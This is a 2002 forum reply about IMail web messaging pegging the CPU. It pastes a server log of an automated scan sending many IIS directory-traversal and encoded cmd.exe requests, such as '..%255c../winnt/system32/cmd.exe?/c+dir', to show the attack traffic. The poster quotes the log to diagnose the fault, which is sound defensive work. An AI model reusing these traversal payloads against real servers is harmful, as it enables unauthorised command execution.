RE: [IMail Forum] HELP!:Web Messaging uses 100% of the CPU

[Gaudin, Marius (Softec)]

Zul,   Same here... it looked as if it was a web security hole searching robot, because the 100% started at about that time. Check your webmail logs for attacks.   ---------------------------------- Begin of log snippet 20020111 182946 Info - 212.181.118.32   GET /scripts/root.exe?/c+dir HTTP/1.0. 20020111 182947 Request processed with no user agent and no referer. 20020111 182951 Info - 212.181.118.32   GET /MSADC/root.exe?/c+dir HTTP/1.0. 20020111 182951 Request processed with no user agent and no referer. 20020111 182955 Info - 212.181.118.32   GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020111 182956 Request processed with no user agent and no referer. 20020111 182956 Info - 212.80.96.33 WhatsUp_Gold/6.0  HEAD / HTTP/1.0. 20020111 183000 Info - 212.181.118.32   GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020111 183000 Request processed with no user agent and no referer. 20020111 183004 Info - 212.181.118.32   GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020111 183004 Request processed with no user agent and no referer. 20020111 183008 Info - 212.181.118.32   GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020111 183008 Request processed with no user agent and no referer. 20020111 183012 Info - 212.181.118.32   GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020111 183012 Request processed with no user agent and no referer. 20020111 183017 Info - 212.181.118.32   GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020111 183017 Request processed with no user agent and no referer. 20020111 183023 Info - 212.181.118.32   GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020111 183023 Request processed with no user agent and no referer. 20020111 183028 Info - 212.181.118.32   GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020111 183028 Request processed with no user agent and no referer. 20020111 183035 Info - 212.181.118.32   GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020111 183035 Request processed with no user agent and no referer. 20020111 183040 Info - 212.181.118.32   GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020111 183040 Request processed with no user agent and no referer. 20020111 183047 Info - 212.181.118.32   GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020111 183047 Request processed with no user agent and no referer. 20020111 183052 Info - 212.181.118.32   GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020111 183052 Request processed with no user agent and no referer. 20020111 183056 Info - 212.80.96.33 WhatsUp_Gold/6.0  HEAD / HTTP/1.0. 20020111 183056 Info - 212.181.118.32   GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020111 183057 Request processed with no user agent and no referer. 20020111 183104 Info - 212.181.118.32   GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0. 20020111 183104 Request processed with no user agent and no referer. ---------------------------------- End of log snippet   IPSwitch Support told me to a) make NT page file 3x the size of physical RAM b) make sure IMail is the only software running on this server c) set IP filters to every single attacker's IP-address   when I refused all of these "recommendations", I was told to   d) call support by phone (after renewing service agreement :-(   The error occurred only once (so far). I built a workaround using perfmon alerter to kill and restart iwebmsg service if proc usage is over 90%. To me, it is obvious that the bug is within IMail because all other software is running smoothly for years now.   Marius -----Original Message----- From: Zul J [mailto:[EMAIL PROTECTED]] Sent: Thursday, January 17, 2002 4:25 AM To: [EMAIL PROTECTED] Subject: [IMail Forum] HELP!:Web Messaging uses 100% of the CPU Hi,   I'm running IMail 7.05, my issue is the web messaging that makes my CPU utilization goes to 100% and hangs the server. I encounter this issue after I update to 7.05.   I've already checked the IPSwitch knowledge base (http://support.ipswitch.com/kb/IM-19990527-DM10.htm) and did the solution that they gave but it still happens.   Hope somebody can help me with this...really appreciate it...Thanks..   -Zul